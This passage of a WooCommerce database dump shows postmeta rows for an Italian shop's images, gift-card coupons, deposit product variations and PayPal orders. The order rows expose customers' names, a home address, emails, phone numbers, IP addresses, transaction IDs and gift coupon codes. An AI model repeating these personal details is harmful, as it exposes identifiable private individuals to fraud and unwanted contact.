width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52027,2985,'_wp_attachment_image_alt','d'),(52028,2986,'_wp_attached_file','2018/09/landing-box-img-2.jpg'),(52029,2986,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:475;s:4:\"file\";s:29:\"2018/09/landing-box-img-2.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-300x223.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"landing-box-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-600x445.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-600x445.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:445;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"landing-box-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18347,474,'mwb_wgm_exclude_per_pro_format',''),(18348,474,'mwb_wgm_include_per_product',''),(18349,474,'mwb_wgm_include_per_pro_format',''),(18350,474,'mwb_wgm_include_per_category','a:0:{}'),(18351,435,'mwb_wgm_exclude_per_pro_format',''),(18352,435,'mwb_wgm_include_per_product',''),(18353,435,'mwb_wgm_include_per_pro_format',''),(18354,435,'mwb_wgm_include_per_category','a:0:{}'),(18355,857,'_order_key','wc_order_ObeYmfqmnaQgl'),(18356,857,'_customer_user','0'),(18357,857,'_payment_method','paypal'),(18358,857,'_payment_method_title','PayPal'),(18359,857,'_customer_ip_address','82.59.220.214'),(18360,857,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1'),(18361,857,'_created_via','checkout'),(18362,857,'_cart_hash','639da221d0a2b465c680577199450735'),(18363,857,'_billing_first_name','Laura'),(18364,857,'_billing_last_name','Pulzetti'),(18365,857,'_billing_address_1','Viale Ginevra 6'),(18366,857,'_billing_city','Rimini'),(18367,857,'_billing_email','Laura-pulzetti@libero.it'),(18368,857,'_billing_phone','3396412789'),(18369,857,'_order_currency','EUR'),(18370,857,'_cart_discount','0'),(18371,857,'_cart_discount_tax','0'),(18372,857,'_order_shipping','0.00'),(18373,857,'_order_shipping_tax','0'),(18374,857,'_order_tax','0'),(18375,857,'_order_total','125.00'),(18376,857,'_order_version','3.6.5'),(18377,857,'_prices_include_tax','no'),(18378,857,'_billing_address_index','Laura Pulzetti  Viale Ginevra 6  Rimini    Laura-pulzetti@libero.it 3396412789'),(18379,857,'_shipping_address_index','        '),(18380,857,'is_vat_exempt','no'),(18381,857,'Quanti adulti?','1'),(18382,857,'Numero bambini fino a 6 anni','0'),(18383,857,'Numero ragazzi fino a 14 anni','0'),(18384,857,'Numero ragazzi dai 15 anni in su','0'),(18385,857,'Files attached','[]'),(18386,857,'Payment type','instant'),(18387,857,'_transaction_id','8W1094967N811714F'),(18388,857,'_paypal_status','completed'),(18389,857,'PayPal Transaction Fee','4.60'),(18390,857,'_date_paid','1563447609'),(18391,857,'_paid_date','2019-07-18 13:00:09'),(18392,857,'_download_permissions_granted','yes'),(18393,857,'_recorded_sales','yes'),(18394,857,'_recorded_coupon_usage_counts','yes'),(18395,857,'_order_stock_reduced','yes'),(18396,858,'discount_type','fixed_cart'),(18397,858,'coupon_amount','125'),(18398,858,'individual_use','no'),(18399,858,'usage_limit','1'),(18400,858,'date_expires','1578960000'),(18401,858,'apply_before_tax','no'),(18402,858,'free_shipping','yes'),(18403,858,'minimum_amount',''),(18404,858,'maximum_amount',''),(18405,858,'exclude_sale_items','no'),(18406,858,'exclude_product_ids',''),(18407,858,'exclude_product_categories',''),(18408,858,'product_ids',''),(18409,858,'product_categories','a:0:{}'),(18410,858,'mwb_wgm_giftcard_coupon','857'),(18411,858,'mwb_wgm_giftcard_coupon_unique','online'),(18412,858,'mwb_wgm_giftcard_coupon_product_id','472'),(18413,858,'mwb_wgm_giftcard_coupon_mail_to','Babbo e mamma'),(18414,857,'857#322','a:1:{i:0;s:18:\"solymarcoupon72RVC\";}'),(18415,857,'mwb_wgm_order_giftcard','send'),(18416,859,'_order_key','wc_order_cPNWzfVZNENaa'),(18417,859,'_customer_user','0'),(18418,859,'_payment_method','paypal'),(18419,859,'_payment_method_title','PayPal'),(18420,859,'_customer_ip_address','213.255.74.90'),(18421,859,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'),(18422,859,'_created_via','checkout'),(18423,859,'_cart_hash','3e56ae75b042b8cbeb2791adb6d382b1'),(18424,859,'_billing_first_name','andrea'),(18425,859,'_billing_last_name','piccinini'),(18426,859,'_billing_email','lambruscokiller@email.it'),(18427,859,'_billing_phone','3402476547'),(18428,859,'_order_currency','EUR'),(18429,859,'_cart_discount','0'),(18430,859,'_cart_discount_tax','0'),(18431,859,'_order_shipping','0.00'),(18432,859,'_order_shipping_tax','0'),(18433,859,'_order_tax','0'),(18434,859,'_order_total','210.00'),(18435,859,'_order_version','3.6.5'),(18436,859,'_prices_include_tax','no'),(18437,859,'_billing_address_index','andrea piccinini        lambruscokiller@email.it 3402476547'),(18438,859,'_shipping_address_index','        '),(18439,859,'is_vat_exempt','no'),(18440,859,'Quanti adulti?','1'),(18441,859,'Numero bambini fino a 6 anni','0'),(18442,859,'Numero ragazzi fino a 14 anni','0'),(18443,859,'Numero ragazzi dai 15 anni in su','0'),(18444,859,'Files attached','[]'),(18445,859,'Payment type','instant'),(18446,859,'_transaction_id','7MW62729SL806150R'),(18447,859,'_paypal_status','completed'),(18448,859,'PayPal Transaction Fee','7.49'),(18449,859,'_date_paid','1563467267'),(18450,859,'_paid_date','2019-07-18 18:27:47'),(18451,859,'_download_permissions_granted','yes'),(18452,859,'_recorded_sales','yes'),(18453,859,'_recorded_coupon_usage_counts','yes'),(18454,859,'_order_stock_reduced','yes'),(18455,860,'discount_type','fixed_cart'),(18456,860,'coupon_amount','15'),(18457,860,'individual_use','no'),(18458,860,'usage_limit','1'),(18459,860,'date_expires','1578960000'),(18460,860,'apply_before_tax','no'),(18461,860,'free_shipping','yes'),(18462,860,'minimum_amount',''),(18463,860,'maximum_amount',''),(18464,860,'exclude_sale_items','no'),(18465,860,'exclude_product_ids',''),(18466,860,'exclude_product_categories',''),(18467,860,'product_ids',''),(18468,860,'product_categories','a:0:{}'),(18469,860,'mwb_wgm_giftcard_coupon','859'),(18470,860,'mwb_wgm_giftcard_coupon_unique','online'),(18471,860,'mwb_wgm_giftcard_coupon_product_id','548'),(18472,860,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18473,859,'859#323','a:14:{i:0;s:18:\"solymarcouponRVJT7\";i:1;s:18:\"solymarcouponRV7RG\";i:2;s:18:\"solymarcouponRJCGH\";i:3;s:18:\"solymarcoupon8T1LO\";i:4;s:18:\"solymarcoupon00RYE\";i:5;s:18:\"solymarcoupon2BXSL\";i:6;s:18:\"solymarcouponGE6LH\";i:7;s:18:\"solymarcouponKYZ90\";i:8;s:18:\"solymarcoupon3C7S1\";i:9;s:18:\"solymarcoupon8X86M\";i:10;s:18:\"solymarcouponN0K4R\";i:11;s:18:\"solymarcoupon8IQHQ\";i:12;s:18:\"solymarcouponR3T3I\";i:13;s:18:\"solymarcouponBPXAH\";}'),(18474,861,'discount_type','fixed_cart'),(18475,861,'coupon_amount','15'),(18476,861,'individual_use','no'),(18477,861,'usage_limit','1'),(18478,861,'date_expires','1578960000'),(18479,861,'apply_before_tax','no'),(18480,861,'free_shipping','yes'),(18481,861,'minimum_amount',''),(18482,861,'maximum_amount',''),(18483,861,'exclude_sale_items','no'),(18484,861,'exclude_product_ids',''),(18485,861,'exclude_product_categories',''),(18486,861,'product_ids',''),(18487,861,'product_categories','a:0:{}'),(18488,861,'mwb_wgm_giftcard_coupon','859'),(18489,861,'mwb_wgm_giftcard_coupon_unique','online'),(18490,861,'mwb_wgm_giftcard_coupon_product_id','548'),(18491,861,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18492,862,'discount_type','fixed_cart'),(18493,862,'coupon_amount','15'),(18494,862,'individual_use','no'),(18495,862,'usage_limit','1'),(18496,862,'date_expires','1578960000'),(18497,862,'apply_before_tax','no'),(18498,862,'free_shipping','yes'),(18499,862,'minimum_amount',''),(18500,862,'maximum_amount',''),(18501,862,'exclude_sale_items','no'),(18502,862,'exclude_product_ids',''),(18503,862,'exclude_product_categories',''),(18504,862,'product_ids',''),(18505,862,'product_categories','a:0:{}'),(18506,862,'mwb_wgm_giftcard_coupon','859'),(18507,862,'mwb_wgm_giftcard_coupon_unique','online'),(18508,862,'mwb_wgm_giftcard_coupon_product_id','548'),(18509,862,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18510,863,'discount_type','fixed_cart'),(18511,863,'coupon_amount','15'),(18512,863,'individual_use','no'),(18513,863,'usage_limit','1'),(18514,863,'date_expires','1578960000'),(18515,863,'apply_before_tax','no'),(18516,863,'free_shipping','yes'),(18517,863,'minimum_amount',''),(18518,863,'maximum_amount',''),(18519,863,'exclude_sale_items','no'),(18520,863,'exclude_product_ids',''),(18521,863,'exclude_product_categories',''),(18522,863,'product_ids',''),(18523,863,'product_categories','a:0:{}'),(18524,863,'mwb_wgm_giftcard_coupon','859'),(18525,863,'mwb_wgm_giftcard_coupon_unique','online'),(18526,863,'mwb_wgm_giftcard_coupon_product_id','548'),(18527,863,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18528,864,'discount_type','fixed_cart'),(18529,864,'coupon_amount','15'),(18530,864,'individual_use','no'),(18531,864,'usage_limit','1'),(18532,864,'date_expires','1578960000'),(18533,864,'apply_before_tax','no'),(18534,864,'free_shipping','yes'),(18535,864,'minimum_amount',''),(18536,864,'maximum_amount',''),(18537,864,'exclude_sale_items','no'),(18538,864,'exclude_product_ids',''),(18539,864,'exclude_product_categories',''),(18540,864,'product_ids',''),(18541,864,'product_categories','a:0:{}'),(18542,864,'mwb_wgm_giftcard_coupon','859'),(18543,864,'mwb_wgm_giftcard_coupon_unique','online'),(18544,864,'mwb_wgm_giftcard_coupon_product_id','548'),(18545,864,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18546,865,'discount_type','fixed_cart'),(18547,865,'coupon_amount','15'),(18548,865,'individual_use','no'),(18549,865,'usage_limit','1'),(18550,865,'date_expires','1578960000'),(18551,865,'apply_before_tax','no'),(18552,865,'free_shipping','yes'),(18553,865,'minimum_amount',''),(18554,865,'maximum_amount',''),(18555,865,'exclude_sale_items','no'),(18556,865,'exclude_product_ids',''),(18557,865,'exclude_product_categories',''),(18558,865,'product_ids',''),(18559,865,'product_categories','a:0:{}'),(18560,865,'mwb_wgm_giftcard_coupon','859'),(18561,865,'mwb_wgm_giftcard_coupon_unique','online'),(18562,865,'mwb_wgm_giftcard_coupon_product_id','548'),(18563,865,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18564,866,'discount_type','fixed_cart'),(18565,866,'coupon_amount','15'),(18566,866,'individual_use','no'),(18567,866,'usage_limit','1'),(18568,866,'date_expires','1578960000'),(18569,866,'apply_before_tax','no'),(18570,866,'free_shipping','yes'),(18571,866,'minimum_amount',''),(18572,866,'maximum_amount',''),(18573,866,'exclude_sale_items','no'),(18574,866,'exclude_product_ids',''),(18575,866,'exclude_product_categories',''),(18576,866,'product_ids',''),(18577,866,'product_categories','a:0:{}'),(18578,866,'mwb_wgm_giftcard_coupon','859'),(18579,866,'mwb_wgm_giftcard_coupon_unique','online'),(18580,866,'mwb_wgm_giftcard_coupon_product_id','548'),(18581,866,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18582,867,'discount_type','fixed_cart'),(18583,867,'coupon_amount','15'),(18584,867,'individual_use','no'),(18585,867,'usage_limit','1'),(18586,867,'date_expires','1578960000'),(18587,867,'apply_before_tax','no'),(18588,867,'free_shipping','yes'),(18589,867,'minimum_amount',''),(18590,867,'maximum_amount',''),(18591,867,'exclude_sale_items','no'),(18592,867,'exclude_product_ids',''),(18593,867,'exclude_product_categories',''),(18594,867,'product_ids',''),(18595,867,'product_categories','a:0:{}'),(18596,867,'mwb_wgm_giftcard_coupon','859'),(18597,867,'mwb_wgm_giftcard_coupon_unique','online'),(18598,867,'mwb_wgm_giftcard_coupon_product_id','548'),(18599,867,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18600,868,'discount_type','fixed_cart'),(18601,868,'coupon_amount','15'),(18602,868,'individual_use','no'),(18603,868,'usage_limit','1'),(18604,868,'date_expires','1578960000'),(18605,868,'apply_before_tax','no'),(18606,868,'free_shipping','yes'),(18607,868,'minimum_amount',''),(18608,868,'maximum_amount',''),(18609,868,'exclude_sale_items','no'),(18610,868,'exclude_product_ids',''),(18611,868,'exclude_product_categories',''),(18612,868,'product_ids',''),(18613,868,'product_categories','a:0:{}'),(18614,868,'mwb_wgm_giftcard_coupon','859'),(18615,868,'mwb_wgm_giftcard_coupon_unique','online'),(18616,868,'mwb_wgm_giftcard_coupon_product_id','548'),(18617,868,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18618,869,'discount_type','fixed_cart'),(18619,869,'coupon_amount','15'),(18620,869,'individual_use','no'),(18621,869,'usage_limit','1'),(18622,869,'date_expires','1578960000'),(18623,869,'apply_before_tax','no'),(18624,869,'free_shipping','yes'),(18625,869,'minimum_amount',''),(18626,869,'maximum_amount',''),(18627,869,'exclude_sale_items','no'),(18628,869,'exclude_product_ids',''),(18629,869,'exclude_product_categories',''),(18630,869,'product_ids',''),(18631,869,'product_categories','a:0:{}'),(18632,869,'mwb_wgm_giftcard_coupon','859'),(18633,869,'mwb_wgm_giftcard_coupon_unique','online'),(18634,869,'mwb_wgm_giftcard_coupon_product_id','548'),(18635,869,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18636,870,'discount_type','fixed_cart'),(18637,870,'coupon_amount','15'),(18638,870,'individual_use','no'),(18639,870,'usage_limit','1'),(18640,870,'date_expires','1578960000'),(18641,870,'apply_before_tax','no'),(18642,870,'free_shipping','yes'),(18643,870,'minimum_amount',''),(18644,870,'maximum_amount',''),(18645,870,'exclude_sale_items','no'),(18646,870,'exclude_product_ids',''),(18647,870,'exclude_product_categories',''),(18648,870,'product_ids',''),(18649,870,'product_categories','a:0:{}'),(18650,870,'mwb_wgm_giftcard_coupon','859'),(18651,870,'mwb_wgm_giftcard_coupon_unique','online'),(18652,870,'mwb_wgm_giftcard_coupon_product_id','548'),(18653,870,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18654,871,'discount_type','fixed_cart'),(18655,871,'coupon_amount','15'),(18656,871,'individual_use','no'),(18657,871,'usage_limit','1'),(18658,871,'date_expires','1578960000'),(18659,871,'apply_before_tax','no'),(18660,871,'free_shipping','yes'),(18661,871,'minimum_amount',''),(18662,871,'maximum_amount',''),(18663,871,'exclude_sale_items','no'),(18664,871,'exclude_product_ids',''),(18665,871,'exclude_product_categories',''),(18666,871,'product_ids',''),(18667,871,'product_categories','a:0:{}'),(18668,871,'mwb_wgm_giftcard_coupon','859'),(18669,871,'mwb_wgm_giftcard_coupon_unique','online'),(18670,871,'mwb_wgm_giftcard_coupon_product_id','548'),(18671,871,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18672,872,'discount_type','fixed_cart'),(18673,872,'coupon_amount','15'),(18674,872,'individual_use','no'),(18675,872,'usage_limit','1'),(18676,872,'date_expires','1578960000'),(18677,872,'apply_before_tax','no'),(18678,872,'free_shipping','yes'),(18679,872,'minimum_amount',''),(18680,872,'maximum_amount',''),(18681,872,'exclude_sale_items','no'),(18682,872,'exclude_product_ids',''),(18683,872,'exclude_product_categories',''),(18684,872,'product_ids',''),(18685,872,'product_categories','a:0:{}'),(18686,872,'mwb_wgm_giftcard_coupon','859'),(18687,872,'mwb_wgm_giftcard_coupon_unique','online'),(18688,872,'mwb_wgm_giftcard_coupon_product_id','548'),(18689,872,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18690,873,'discount_type','fixed_cart'),(18691,873,'coupon_amount','15'),(18692,873,'individual_use','no'),(18693,873,'usage_limit','1'),(18694,873,'date_expires','1578960000'),(18695,873,'apply_before_tax','no'),(18696,873,'free_shipping','yes'),(18697,873,'minimum_amount',''),(18698,873,'maximum_amount',''),(18699,873,'exclude_sale_items','no'),(18700,873,'exclude_product_ids',''),(18701,873,'exclude_product_categories',''),(18702,873,'product_ids',''),(18703,873,'product_categories','a:0:{}'),(18704,873,'mwb_wgm_giftcard_coupon','859'),(18705,873,'mwb_wgm_giftcard_coupon_unique','online'),(18706,873,'mwb_wgm_giftcard_coupon_product_id','548'),(18707,873,'mwb_wgm_giftcard_coupon_mail_to','lambruscokiller@email.it'),(18708,859,'mwb_wgm_order_giftcard','send'),(18709,875,'_edit_lock','1564030393:1'),(18710,875,'_edit_last','1'),(18711,875,'_sku','caparra'),(18712,875,'total_sales','30'),(18713,875,'_tax_status','taxable'),(18714,875,'_tax_class',''),(18715,875,'_manage_stock','no'),(18716,875,'_backorders','no'),(18717,875,'_sold_individually','no'),(18718,875,'_virtual','no'),(18719,875,'_downloadable','no'),(18720,875,'_download_limit','-1'),(18721,875,'_download_expiry','-1'),(18722,875,'_stock',NULL),(18723,875,'_stock_status','instock'),(18724,875,'_wc_average_rating','0'),(18725,875,'_wc_review_count','0'),(18726,875,'_product_attributes','a:1:{s:17:\"pa_numero-coperti\";a:6:{s:4:\"name\";s:17:\"pa_numero-coperti\";s:5:\"value\";s:0:\"\";s:8:\"position\";s:1:\"0\";s:10:\"is_visible\";s:1:\"1\";s:12:\"is_variation\";s:1:\"1\";s:11:\"is_taxonomy\";s:1:\"1\";}}'),(18727,875,'_product_version','4.8.0'),(18728,875,'_yoast_wpseo_primary_product_cat','27'),(18729,875,'_yoast_wpseo_content_score','90'),(18731,876,'_variation_description',''),(18732,876,'total_sales','0'),(18733,876,'_tax_status','taxable'),(18734,876,'_tax_class','parent'),(18735,876,'_manage_stock','no'),(18736,876,'_backorders','no'),(18737,876,'_sold_individually','no'),(18738,876,'_virtual','no'),(18739,876,'_downloadable','no'),(18740,876,'_download_limit','-1'),(18741,876,'_download_expiry','-1'),(18742,876,'_stock',NULL),(18743,876,'_stock_status','instock'),(18744,876,'_wc_average_rating','0'),(18745,876,'_wc_review_count','0'),(18746,876,'attribute_pa_numero-coperti','4'),(18747,876,'_product_version','3.6.5'),(18748,877,'_variation_description',''),(18749,877,'total_sales','0'),(18750,877,'_tax_status','taxable'),(18751,877,'_tax_class','parent'),(18752,877,'_manage_stock','no'),(18753,877,'_backorders','no'),(18754,877,'_sold_individually','no'),(18755,877,'_virtual','no'),(18756,877,'_downloadable','no'),(18757,877,'_download_limit','-1'),(18758,877,'_download_expiry','-1'),(18759,877,'_stock',NULL),(18760,877,'_stock_status','instock'),(18761,877,'_wc_average_rating','0'),(18762,877,'_wc_review_count','0'),(18763,877,'attribute_pa_numero-coperti','5'),(18764,877,'_product_version','3.6.5'),(18765,878,'_variation_description',''),(18766,878,'total_sales','0'),(18767,878,'_tax_status','taxable'),(18768,878,'_tax_class','parent'),(18769,878,'_manage_stock','no'),(18770,878,'_backorders','no'),(18771,878,'_sold_individually','no'),(18772,878,'_virtual','no'),(18773,878,'_downloadable','no'),(18774,878,'_download_limit','-1'),(18775,878,'_download_expiry','-1'),(18776,878,'_stock',NULL),(18777,878,'_stock_status','instock'),(18778,878,'_wc_average_rating','0'),(18779,878,'_wc_review_count','0'),(18780,878,'attribute_pa_numero-coperti','6'),(18781,878,'_product_version','3.6.5'),(18782,879,'_variation_description',''),(18783,879,'total_sales','0'),(18784,879,'_tax_status','taxable'),(18785,879,'_tax_class','parent'),(18786,879,'_manage_stock','no'),(18787,879,'_backorders','no'),(18788,879,'_sold_individually','no'),(18789,879,'_virtual','no'),(18790,879,'_downloadable','no'),(18791,879,'_download_limit','-1'),(18792,879,'_download_expiry','-1'),(18793,879,'_stock',NULL),(18794,879,'_stock_status','instock'),(18795,879,'_wc_average_rating','0'),(18796,879,'_wc_review_count','0'),(18797,879,'attribute_pa_numero-coperti','7'),(18798,879,'_product_version','3.6.5'),(18799,880,'_variation_description',''),(18800,880,'total_sales','0'),(18801,880,'_tax_status','taxable'),(18802,880,'_tax_class','parent'),(18803,880,'_manage_stock','no'),(18804,880,'_backorders','no'),(18805,880,'_sold_individually','no'),(18806,880,'_virtual','no'),(18807,880,'_downloadable','no'),(18808,880,'_download_limit','-1'),(18809,880,'_download_expiry','-1'),(18810,880,'_stock',NULL),(18811,880,'_stock_status','instock'),(18812,880,'_wc_average_rating','0'),(18813,880,'_wc_review_count','0'),(18814,880,'attribute_pa_numero-coperti','8'),(18815,880,'_product_version','3.6.5'),(18816,881,'_variation_description',''),(18817,881,'total_sales','0'),(18818,881,'_tax_status','taxable'),(18819,881,'_tax_class','parent'),(18820,881,'_manage_stock','no'),(18821,881,'_backorders','no'),(18822,881,'_sold_individually','no'),(18823,881,'_virtual','no'),(18824,881,'_downloadable','no'),(18825,881,'_download_limit','-1'),(18826,881,'_download_expiry','-1'),(18827,881,'_stock',NULL),(18828,881,'_stock_status','instock'),(18829,881,'_wc_average_rating','0'),(18830,881,'_wc_review_count','0'),(18831,881,'attribute_pa_numero-coperti','2'),(18832,881,'_product_version','3.6.5'),(18833,882,'_variation_description',''),(18834,882,'total_sales','0'),(18835,882,'_tax_status','taxable'),(18836,882,'_tax_class','parent'),(18837,882,'_manage_stock','no'),(18838,882,'_backorders','no'),(18839,882,'_sold_individually','no'),(18840,882,'_virtual','no'),(18841,882,'_downloadable','no'),(18842,882,'_download_limit','-1'),(18843,882,'_download_expiry','-1'),(18844,882,'_stock',NULL),(18845,882,'_stock_status','instock'),(18846,882,'_wc_average_rating','0'),(18847,882,'_wc_review_count','0'),(18848,882,'attribute_pa_numero-coperti','3'),(18849,882,'_product_version','3.6.5'),(18850,876,'_sku','caparrax4'),(18851,876,'_regular_price','60'),(18852,876,'_price','60'),(18853,877,'_sku','caparrax5'),(18854,877,'_regular_price','75'),(18855,877,'_price','75'),(18856,878,'_sku','caparrax6'),(18857,878,'_regular_price','90'),(18858,878,'_price','90'),(18859,879,'_sku','caparrax7'),(18860,879,'_regular_price','105'),(18861,879,'_price','105'),(18862,880,'_sku','caparrax8'),(18863,880,'_regular_price','120'),(18864,880,'_price','120'),(18865,881,'_sku','caparrax2'),(18866,881,'_regular_price','30'),(18867,881,'_price','30'),(18868,882,'_sku','caparrax3'),(18869,882,'_regular_price','45'),(18870,882,'_price','45'),(18871,875,'_price','30'),(18872,875,'_price','45'),(18873,875,'_price','60'),(18874,875,'_price','75'),(18875,875,'_price','90'),(18876,875,'_price','105'),(18877,875,'_price','120'),(18878,884,'_wp_attached_file','2019/07/coupon-716.jpg'),(18879,884,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:626;s:6:\"height\";i:417;s:4:\"file\";s:22:\"2019/07/coupon-716.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"coupon-716-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"coupon-716-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"coupon-716-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"coupon-716-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"coupon-716-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:22:\"coupon-716-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:22:\"coupon-716-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:22:\"coupon-716-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:22:\"coupon-716-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"coupon-716-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"coupon-716-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"coupon-716-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(18880,875,'_thumbnail_id','212'),(18881,885,'_menu_item_type','post_type'),(18882,885,'_menu_item_menu_item_parent','0'),(18883,885,'_menu_item_object_id','875'),(18884,885,'_menu_item_object','product'),(18885,885,'_menu_item_target',''),(18886,885,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(18887,885,'_menu_item_xfn',''),(18888,885,'_menu_item_url',''),(18890,886,'_order_key','wc_order_0GxtvBvVzbAtq'),(18891,886,'_customer_user','0'),(18892,886,'_payment_method','paypal'),(18893,886,'_payment_method_title','PayPal'),(18894,886,'_customer_ip_address','37.176.143.176'),(18895,886,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 